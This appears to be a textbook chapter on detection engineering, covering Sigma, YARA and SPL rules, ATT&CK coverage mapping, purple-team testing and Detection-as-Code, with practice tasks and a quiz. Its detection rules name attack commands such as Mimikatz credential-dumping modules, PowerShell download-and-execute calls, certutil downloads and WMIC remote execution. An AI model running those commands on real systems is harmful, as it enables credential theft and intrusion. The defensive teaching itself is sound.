Chapter 4: Detection Engineering¶
Learning Objectives¶
By the end of this chapter, you will be able to:
- Design detection rules mapped to MITRE ATT&CK techniques
- Write signature-based and behavior-based detection logic
- Test detections using purple teaming methodologies
- Measure detection coverage and identify gaps
- Apply the Detection-as-Code approach for version control and CI/CD
Prerequisites¶
- Chapter 3: SIEM query languages and correlation rules
- Understanding of MITRE ATT&CK framework
- Familiarity with common attack techniques (PowerShell abuse, lateral movement, etc.)
Key Concepts¶
Detection Engineering • Sigma Rules • YARA Rules • Purple Teaming • Detection-as-Code • False Positive Rate • Detection Coverage
Curiosity Hook: The Blind Spot¶
Your organization invests heavily in endpoint protection, firewalls, and SIEM—yet an attacker used Living off the Land Binaries (LOLBins) to persist for 45 days undetected.
Why? No detection existed for their specific technique: using certutil.exe to download payloads.
The Fix: A detection engineer wrote a rule in 20 minutes:
title: Certutil Download Activity
description: Detects certutil.exe downloading files from web URLs
status: experimental
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\certutil.exe'
    CommandLine|contains:
      - 'urlcache'
      - 'http'
  condition: selection
Result: 3 similar attacks detected in the next month.
Lesson: Proactive detection engineering closes gaps before they're exploited.
4.1 What is Detection Engineering?¶
Definition¶
Detection Engineering is the discipline of designing, building, testing, and maintaining detection rules that identify malicious activity across an organization's security telemetry.
The Detection Lifecycle¶
[Threat Research] → [Rule Design] → [Development] → [Testing] → [Deployment] → [Tuning] → [Retirement]
        ↑                                                                         │
        └─────────────────────────────────────────────────────────────────────────┘
- Threat Research: Study attack techniques (MITRE ATT&CK, threat intel, incident reports)
- Rule Design: Map technique to observable telemetry
- Development: Write rule logic (Sigma, KQL, SPL, YARA)
- Testing: Validate with purple team exercises and test data
- Deployment: Push to production SIEM/EDR
- Tuning: Adjust thresholds, add exclusions based on FP feedback
- Retirement: Deprecate rules made obsolete by infrastructure changes or tool evolution
Detection Pyramid¶
           /\
          /  \
         /Tactical\          (Threat intel IOCs: IP, hash, domain)
        /──────────\
       / Behavioral \        (Attack techniques / TTPs)
      /──────────────\
     /   Analytical   \      (Anomaly- and ML-based)
    /──────────────────\
Levels:
- Tactical (top): IOC-based (fast to deploy, easy to evade)
- Behavioral (middle): Technique-based (harder to evade, more durable)
- Analytical (base): Anomaly- and pattern-based (most robust, highest effort)
Best Practice: Build detections at all levels. IOCs catch known threats; behavioral rules catch variants; analytics catch novel techniques.
4.2 Detection Types¶
1. Signature-based Detection¶
Definition: Match specific known indicators (file hash, domain, regex pattern).
Example: Detect Known Malware Hash
index=endpoint file_hash="5d41402abc4b2a76b9719d911017c592"
| table _time, host, file_path, process_name
Pros:
- High precision (low FPs)
- Fast performance
- Easy to understand

Cons:
- Trivial to evade (change one byte → new hash)
- Requires constant updates
- Misses zero-day threats
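The signature approach can be sketched in a few lines of Python; the IOC set is hypothetical (it reuses the MD5 from the SPL example above), and `hashlib` is standard library:

```python
import hashlib

# Hypothetical IOC feed: the known-bad MD5 from the SPL example above
KNOWN_BAD_HASHES = {"5d41402abc4b2a76b9719d911017c592"}

def is_known_malware(file_bytes: bytes) -> bool:
    """Signature check: hash the content and look it up in the IOC set."""
    return hashlib.md5(file_bytes).hexdigest() in KNOWN_BAD_HASHES

# Precision is high, but changing a single byte produces a new hash
print(is_known_malware(b"hello"))   # this content matches the IOC
print(is_known_malware(b"hello!"))  # one extra byte evades the signature
```

This is exactly the evasion problem noted above: the second call misses even though the content is nearly identical.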
2. Behavior-based Detection¶
Definition: Identify malicious behavior patterns independent of specific IOCs.
Example: Detect PowerShell Download & Execute
title: PowerShell Download and Execute
logsource:
  category: process_creation
  product: windows
detection:
  selection_download:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadString'
      - 'DownloadFile'
  selection_execute:
    CommandLine|contains:
      - 'Invoke-Expression'
      - 'IEX'
      - 'Start-Process'
  condition: selection_download and selection_execute
Pros:
- Detects the technique, not a specific malware sample
- Harder to evade (the attacker must change their TTP)
- Durable across campaigns

Cons:
- Higher FP risk (legitimate admin scripts may match)
- Requires context and tuning
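As an illustrative sketch (not a real Sigma backend), the download-and-execute logic above maps to a simple Python predicate over a process-creation event. Field names follow the rule; the event itself is hypothetical:

```python
# Token lists mirror the two selections in the Sigma rule above
DOWNLOAD_TOKENS = ("Invoke-WebRequest", "DownloadString", "DownloadFile")
EXECUTE_TOKENS = ("Invoke-Expression", "IEX", "Start-Process")

def rule_matches(event: dict) -> bool:
    """condition: selection_download and selection_execute"""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    download = image.endswith("\\powershell.exe") and any(t in cmd for t in DOWNLOAD_TOKENS)
    execute = any(t in cmd for t in EXECUTE_TOKENS)
    return download and execute

event = {
    "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": "powershell IEX ((New-Object Net.WebClient)"
                   ".DownloadString('http://example/p.ps1'))",
}
print(rule_matches(event))  # True: both selections hit
```

Note that any malware family using this PowerShell pattern matches, regardless of its hash.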
3. Anomaly-based Detection¶
Definition: Use baseline behavior to identify outliers.
Example: Detect Unusual File Access Volume
index=file_access
| bin _time span=1h
| stats count by user, _time
| eventstats avg(count) as avg_count, stdev(count) as stdev_count by user
| eval threshold = avg_count + (3 * stdev_count)
| where count > threshold
Logic: Alert when user accesses >3 standard deviations more files than their baseline.
Pros:
- Detects novel attacks without signatures
- Adapts to the environment

Cons:
- Requires a training period to establish a baseline
- Can be evaded by slow, gradual behavior changes
- Higher FP rate during legitimate business changes (mergers, role changes)
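The threshold math in the SPL above can be reproduced in a few lines of Python (the hourly counts are illustrative):

```python
import statistics

# Hourly file-access counts for one user (illustrative baseline data)
hourly_counts = [40, 55, 48, 52, 45, 50, 47, 53]

avg = statistics.mean(hourly_counts)
stdev = statistics.stdev(hourly_counts)
threshold = avg + 3 * stdev  # same formula as the eval step above

def is_anomalous(count: float) -> bool:
    return count > threshold

print(is_anomalous(60))   # within normal variation
print(is_anomalous(500))  # far beyond the baseline: alert
```

The "training period" drawback is visible here: with too few baseline samples, the mean and standard deviation are unreliable and the threshold swings wildly.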
4.3 Writing Detection Rules¶
Sigma: Universal Detection Format¶
Sigma is a vendor-neutral rule format that translates to multiple SIEM query languages (SPL, KQL, EQL, etc.).
Example: Detect Mimikatz Execution
title: Mimikatz Credential Dumping
id: f9c6d85e-4d6e-4f5a-9e2a-3c8f0d5e2a1b
status: stable
description: Detects execution of Mimikatz credential dumping tool
references:
  - https://attack.mitre.org/software/S0002/
tags:
  - attack.credential_access
  - attack.t1003.001
logsource:
  category: process_creation
  product: windows
detection:
  selection_img:
    Image|endswith:
      - '\mimikatz.exe'
      - '\mimilib.dll'
  selection_cli:
    CommandLine|contains:
      - 'sekurlsa::logonpasswords'
      - 'lsadump::sam'
      - 'kerberos::golden'
  condition: selection_img or selection_cli
falsepositives:
  - Legitimate penetration testing (whitelist known test systems)
level: critical
Key Fields:
- title: Human-readable name
- id: Unique identifier (UUID)
- tags: MITRE ATT&CK mapping
- logsource: Where to find this data
- detection: Logic (selections and conditions)
- falsepositives: Known benign cases
- level: Severity (low, medium, high, critical)
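A CI step can enforce these key fields before a rule is merged. This sketch checks a rule that has already been parsed into a Python dict (a real pipeline would load the YAML file first):

```python
# Required key fields from the list above (subset chosen for illustration)
REQUIRED_FIELDS = {"title", "id", "logsource", "detection", "level"}

def missing_fields(rule: dict) -> list:
    """Return required fields absent from a parsed Sigma rule."""
    return sorted(REQUIRED_FIELDS - rule.keys())

draft_rule = {
    "title": "Mimikatz Credential Dumping",
    "id": "f9c6d85e-4d6e-4f5a-9e2a-3c8f0d5e2a1b",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {"condition": "selection_img or selection_cli"},
}
print(missing_fields(draft_rule))  # ['level']: the draft forgot a severity
```

Rejecting rules with missing metadata keeps the rule repository searchable and mapped to ATT&CK.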
YARA: File and Memory Scanning¶
YARA rules detect patterns in files or memory (used by EDR, sandboxes, threat hunting tools).
Example: Detect Ransomware String Patterns
rule Ransomware_Generic_Strings {
    meta:
        description = "Generic ransomware string patterns"
        author = "SOC Detection Team"
        date = "2026-02-15"
    strings:
        $s1 = "Your files have been encrypted" ascii wide
        $s2 = "bitcoin wallet" nocase
        $s3 = ".onion" ascii
        $s4 = "decrypt" fullword nocase
        $s5 = "ransom" fullword nocase
    condition:
        3 of ($s*)
}
Logic: Flag files containing 3+ ransomware-related strings.
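A rough Python equivalent of the `3 of ($s*)` condition (case-insensitivity approximated by lowercasing; the `fullword` and `wide` modifiers are omitted for brevity):

```python
# Lower-cased versions of the rule's string patterns
PATTERNS = [
    "your files have been encrypted",
    "bitcoin wallet",
    ".onion",
    "decrypt",
    "ransom",
]

def yara_like_match(data: bytes, minimum: int = 3) -> bool:
    """Flag content containing at least `minimum` of the patterns."""
    text = data.decode("latin-1").lower()
    hits = sum(1 for p in PATTERNS if p in text)
    return hits >= minimum

note = b"Your files have been encrypted! Send BTC to our bitcoin wallet via the .onion portal."
print(yara_like_match(note))                        # True: 3 of 5 strings present
print(yara_like_match(b"quarterly invoice attached"))  # False
```

Requiring several strings, rather than any one, is what keeps this generic rule from firing on every document that mentions "decrypt".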
4.4 Detection Coverage Mapping¶
MITRE ATT&CK Mapping¶
Goal: Ensure detection coverage across the attack lifecycle.
Example Coverage Matrix:
| Tactic | Technique | Detection | Status | Last Tested |
|---|---|---|---|---|
| Initial Access | T1566.001 (Phishing: Attachment) | Email gateway + EDR | Active | 2026-01-15 |
| Execution | T1059.001 (PowerShell) | Suspicious script execution | Active | 2026-02-01 |
| Persistence | T1053.005 (Scheduled Task) | New scheduled task creation | Active | 2026-01-20 |
| Credential Access | T1003.001 (LSASS Memory) | Mimikatz detection + LSASS access | Active | 2026-02-10 |
| Lateral Movement | T1021.001 (RDP) | Unusual RDP connections | Tuning | 2026-01-25 |
| Exfiltration | T1041 (Exfiltration Over C2 Channel) | Large outbound transfers | Experimental | 2026-02-05 |
Coverage Metrics:
- Technique Coverage: % of applicable ATT&CK techniques with at least one detection
- Detection Depth: Average number of detections per technique
- Test Coverage: % of detections tested in the past 90 days
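Technique coverage falls out of simple set arithmetic over a technique inventory. The sets below are illustrative, drawn from the matrix above:

```python
# Applicable techniques vs. techniques with at least one detection
applicable = {"T1566.001", "T1059.001", "T1053.005", "T1003.001",
              "T1021.001", "T1041", "T1218.011"}
covered = {"T1566.001", "T1059.001", "T1053.005", "T1003.001",
           "T1021.001", "T1041"}

coverage_pct = 100 * len(applicable & covered) / len(applicable)
gaps = sorted(applicable - covered)

print(f"Technique coverage: {coverage_pct:.0f}%")
print(f"Gaps: {gaps}")  # the uncovered techniques feed gap analysis
```

The leftover set is exactly the input to the gap-analysis process described next.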
Gap Analysis¶
Process:
1. List all ATT&CK techniques relevant to your environment (focus on common and critical ones)
2. Map existing detections to techniques
3. Identify gaps (techniques with zero detections)
4. Prioritize gaps based on:
   - Prevalence in recent incidents
   - Threat intelligence indicating active use
   - Ease of detection (available telemetry)
5. Develop new detections to close high-priority gaps
Example Gap:
- Technique: T1218.011 (Rundll32)
- Gap: No detection for Rundll32 executing DLLs from temp directories
- Telemetry Available: Yes (process creation logs with command lines)
- Priority: High (seen in recent ransomware campaigns)
- Action: Develop a Sigma rule for unusual Rundll32 usage
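One way to turn the prioritization criteria into a repeatable score; the weights below are an illustrative assumption, not a standard:

```python
def gap_priority(prevalence: int, active_in_intel: bool, telemetry_available: bool) -> int:
    """Score a detection gap 0-10; higher means close it sooner."""
    score = max(0, min(prevalence, 5))        # 0-5 from incident frequency
    score += 3 if active_in_intel else 0      # threat intel reports active use
    score += 2 if telemetry_available else 0  # data is already collected
    return score

# The Rundll32 gap above: prevalent, actively used, telemetry on hand
print(gap_priority(4, True, True))    # high: work this one first
print(gap_priority(1, False, False))  # low: revisit later
```

Scoring gaps consistently keeps the backlog ordered by risk rather than by whichever gap was noticed most recently.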
4.5 Testing Detections: Purple Teaming¶
What is Purple Teaming?¶
Purple Teaming combines red team (offensive) and blue team (defensive) exercises to validate and improve detections.
Workflow:
1. Plan: Red team selects an ATT&CK technique to test
2. Execute: Red team safely simulates the technique in a test environment
3. Detect: Blue team monitors SIEM/EDR for alerts
4. Evaluate: Did the detection fire? How long did it take? Any FPs?
5. Improve: Tune the rule based on results
Testing Frameworks¶
Atomic Red Team
- Open-source library of small, focused tests mapped to ATT&CK
- Example: Test T1003.001 (LSASS dumping)

Expected Detection: EDR or SIEM should alert on:
- A process accessing LSASS memory
- Creation of an LSASS dump file
- Execution of known dumping tools (e.g., procdump.exe)

Caldera
- Automated adversary emulation platform
- Executes multi-step attack chains
- Measures detection and response effectiveness
Test Documentation¶
Example Test Result:
Test ID: DET-2026-034
Technique: T1059.001 (PowerShell)
Detection: "Suspicious PowerShell Execution"
Date: 2026-02-15
Tester: Alice (Red Team)
Test Scenario:
Executed: powershell.exe -enc <base64_payload>
Action: Download test file from internal web server
Results:
✅ Detection fired: YES
⏱ Time to alert: 4 seconds
📊 Alert quality: HIGH (minimal context needed)
❌ False Positives: None observed
Tuning Actions:
- None required
- Validated detection is working as expected
4.6 Detection-as-Code¶
Principles¶
- Version Control: Store detection rules in Git (track changes, rollback, collaboration)
- Peer Review: Require code review before deployment (catch logic errors, improve quality)
- CI/CD Pipeline: Automate testing and deployment
- Documentation: Embed metadata (ATT&CK tags, references, false positives)
- Testing: Automated validation against test datasets
Example Git Workflow¶
detection-rules/
├── sigma/
│ ├── process_creation/
│ │ ├── mimikatz_detection.yml
│ │ └── powershell_download_execute.yml
│ └── network/
│ └── dns_tunneling.yml
├── yara/
│ └── ransomware_strings.yar
├── tests/
│ └── test_mimikatz_detection.py
└── README.md
CI Pipeline (GitHub Actions):
name: Detection Rule Validation
on: [push, pull_request]
jobs:
  validate:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Validate Sigma Rules
        run: |
          pip install sigma-cli
          sigma check sigma/
      - name: Convert to Splunk SPL
        run: |
          sigma plugin install splunk
          sigma convert -t splunk -p splunk_windows sigma/ -o converted.spl
      - name: Run Unit Tests
        run: pytest tests/
Benefits:
- Catch syntax errors before production
- Maintain an audit trail of changes
- Enable collaboration across the SOC team
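A unit test like `tests/test_mimikatz_detection.py` from the repository layout above might look like this sketch. The `rule_matches` helper here is a hypothetical stand-in for whatever rule-evaluation harness the team actually uses:

```python
# Sketch of tests/test_mimikatz_detection.py; rule_matches is a hypothetical
# stand-in for a real rule-evaluation harness
MIMIKATZ_TOKENS = ("sekurlsa::logonpasswords", "lsadump::sam", "kerberos::golden")

def rule_matches(event: dict) -> bool:
    """Mirrors the Mimikatz rule: image match OR command-line match."""
    image_hit = event.get("Image", "").lower().endswith(
        ("\\mimikatz.exe", "\\mimilib.dll"))
    cli_hit = any(t in event.get("CommandLine", "") for t in MIMIKATZ_TOKENS)
    return image_hit or cli_hit

def test_detects_renamed_binary_via_command_line():
    # A renamed binary is still caught by its command line
    event = {"Image": r"C:\tmp\svc.exe",
             "CommandLine": "svc.exe sekurlsa::logonpasswords"}
    assert rule_matches(event)

def test_ignores_benign_process():
    event = {"Image": r"C:\Windows\System32\notepad.exe",
             "CommandLine": "notepad.exe report.txt"}
    assert not rule_matches(event)
```

Running these in CI means a refactor that accidentally weakens the rule fails the pipeline instead of silently shipping.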
Interactive Element¶
MicroSim 4: Detection Rule Builder
Build and test detection rules for common attack techniques. See real-time feedback on precision and recall.
Common Misconceptions¶
Misconception: More Detections = Better Security
Reality: Quality over quantity. 10 high-fidelity, well-tuned detections outperform 100 noisy rules. Focus on coverage of critical techniques with low FP rates.
Misconception: Signature-based Detections Are Obsolete
Reality: Signatures remain valuable for known threats (malware hashes, C2 domains). Use them as part of a layered strategy alongside behavioral and anomaly-based detections.
Misconception: Purple Team Testing Is Only for Large Organizations
Reality: Small teams can use free tools like Atomic Red Team to validate detections. Even manual tests (run a known attack in a VM, check if alert fires) are valuable.
Practice Tasks¶
Task 1: Map Detection to ATT&CK¶
Given this detection rule, identify the MITRE ATT&CK technique(s) it addresses:
title: PsExec Lateral Movement
detection:
  selection:
    Image|endswith: '\PsExec.exe'
    CommandLine|contains: '\\\\'
  condition: selection
Answer
Technique: T1021.002 (Remote Services: SMB/Windows Admin Shares)
Tactic: Lateral Movement
Explanation: PsExec is a common tool for lateral movement via SMB, executing commands on remote systems using Windows Admin Shares.
Task 2: Identify False Positive Risks¶
This rule detects unusual outbound network connections:
index=firewall action=allowed NOT dest_port IN (80, 443, 53)
| stats count by src_ip, dest_ip, dest_port
| where count < 5
Question: What are potential sources of false positives?
Answer
Potential false positives:
- Legitimate applications using non-standard ports (VPNs, backup software, database connections)
- Software updates connecting to vendor servers on various ports
- Internal services (SSH port 22, RDP port 3389, custom apps)
- Cloud services using dynamic port ranges

Mitigation:
- Allowlist known applications and destinations
- Focus on unusual port/destination combinations
- Add asset context (flag only critical systems)
- Increase thresholds or add velocity checks
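The allowlist mitigation can be sketched as a suppression step applied before alerts reach analysts. The entries below are hypothetical:

```python
# Known-good (source IP, destination port) pairs; entries are hypothetical
ALLOWLIST = {
    ("10.0.5.12", 5432),  # app server to PostgreSQL
    ("10.0.9.3", 1194),   # VPN concentrator (OpenVPN)
}

def should_alert(src_ip: str, dest_port: int) -> bool:
    """Suppress alerts for allowlisted pairs; everything else surfaces."""
    return (src_ip, dest_port) not in ALLOWLIST

print(should_alert("10.0.5.12", 5432))  # False: allowlisted pair
print(should_alert("10.0.5.99", 4444))  # True: unexpected port, alert
```

Keeping the allowlist as data (reviewable in version control) rather than buried in the query makes each exclusion auditable.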
Task 3: Design a Detection¶
Scenario: An attacker uses wmic.exe to execute commands on a remote system for lateral movement.
Available Telemetry: Windows process creation logs with command-line arguments.
Task: Write a Sigma rule (in YAML format) to detect this technique.
Answer
title: WMIC Lateral Movement
id: a1b2c3d4-e5f6-7890-1234-567890abcdef
status: experimental
description: Detects use of WMIC for remote command execution
references:
  - https://attack.mitre.org/techniques/T1047/
tags:
  - attack.execution
  - attack.lateral_movement
  - attack.t1047
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\wmic.exe'
    CommandLine|contains|all:
      - '/node:'
      - 'process call create'
  condition: selection
falsepositives:
  - Legitimate remote administration (whitelist admin workstations)
  - Management tools using WMIC
level: high
Exam Prep & Certifications¶
Relevant Certifications
The topics in this chapter align with the following certifications:
- CompTIA Security+ — Domains: Security Operations, Security Architecture
- CompTIA CySA+ — Domains: Security Operations, Threat Management
- GIAC GCIH — Domains: Incident Handling, Detection and Correlation
- CISSP — Domains: Security Operations, Security Assessment and Testing
Self-Assessment Quiz¶
Question 1: What is the primary advantage of behavior-based detections over signature-based detections?
Options:
a) Behavior-based detections have zero false positives
b) Behavior-based detections are easier to write
c) Behavior-based detections are harder to evade and detect technique variants
d) Behavior-based detections require no tuning
Show Answer
Correct Answer: c) Behavior-based detections are harder to evade and detect technique variants
Explanation: Behavior-based rules focus on attacker techniques (how they act) rather than specific indicators (malware hash). Attackers can easily change hashes but changing techniques requires altering their entire approach.
Question 2: What does the Sigma rule format enable?
Options:
a) Automatic penetration testing
b) Vendor-neutral detection rules that convert to multiple SIEM query languages
c) Real-time threat intelligence sharing
d) Encrypted log storage
Show Answer
Correct Answer: b) Vendor-neutral detection rules that convert to multiple SIEM query languages
Explanation: Sigma rules are written once in YAML and can be converted to SPL (Splunk), KQL (Microsoft Sentinel), EQL (Elastic), and other query languages using Sigma's conversion tooling (sigma-cli, the successor to the legacy sigmac converter).
Question 3: In purple teaming, what is the role of the red team?
Options:
a) Monitor SIEM alerts and investigate incidents
b) Safely simulate attack techniques to test detections
c) Write detection rules and tune thresholds
d) Manage the SIEM infrastructure
Show Answer
Correct Answer: b) Safely simulate attack techniques to test detections
Explanation: Red team executes controlled attacks to test if blue team detections work. Blue team monitors and validates alerts. This collaboration improves detection coverage.
Question 4: Which metric measures the percentage of ATT&CK techniques that have at least one detection?
Options:
a) Mean Time to Detect (MTTD)
b) False Positive Rate
c) Technique Coverage
d) Alert Volume
Show Answer
Correct Answer: c) Technique Coverage
Explanation: Technique coverage is the percentage of applicable ATT&CK techniques for which you have detections. Higher coverage means fewer blind spots.
Question 5: What is a key benefit of storing detection rules in version control (Git)?
Options:
a) Automatically fixes false positives
b) Tracks changes, enables rollback, and supports collaboration
c) Increases SIEM query performance
d) Eliminates the need for testing
Show Answer
Correct Answer: b) Tracks changes, enables rollback, and supports collaboration
Explanation: Version control provides audit trails, allows reverting bad changes, and enables peer review through pull requests. It's a core practice of Detection-as-Code.
Question 6: Which of the following is a false positive mitigation strategy?
Options:
a) Remove all detection rules
b) Add allowlists for known benign processes or systems
c) Set all alert severities to 'critical'
d) Disable correlation in the SIEM
Show Answer
Correct Answer: b) Add allowlists for known benign processes or systems
Explanation: Allowlisting (also called whitelisting) excludes known-good entities from triggering alerts, reducing false positives while preserving detection coverage for threats.
Summary¶
In this chapter, you learned:
- Detection engineering lifecycle: Research, design, development, testing, deployment, tuning
- Detection types: Signature-based (IOCs), behavior-based (techniques), anomaly-based (baselines)
- Sigma rules: Vendor-neutral detection format for portable, maintainable rules
- YARA rules: Pattern matching for files and memory
- Detection coverage: Map detections to MITRE ATT&CK to identify gaps
- Purple teaming: Collaborative testing to validate detection effectiveness
- Detection-as-Code: Version control, CI/CD, and automation for detection rules
Next Steps¶
- Next Chapter: Chapter 5: Triage & Investigation - Learn systematic investigation workflows
- Practice: Use Atomic Red Team to test a detection in your lab environment
- Build: Create a GitHub repo for your team's detection rules
- Explore: Review the Sigma rule repository for community-contributed detections
Chapter 4 Complete | Next: Chapter 5 →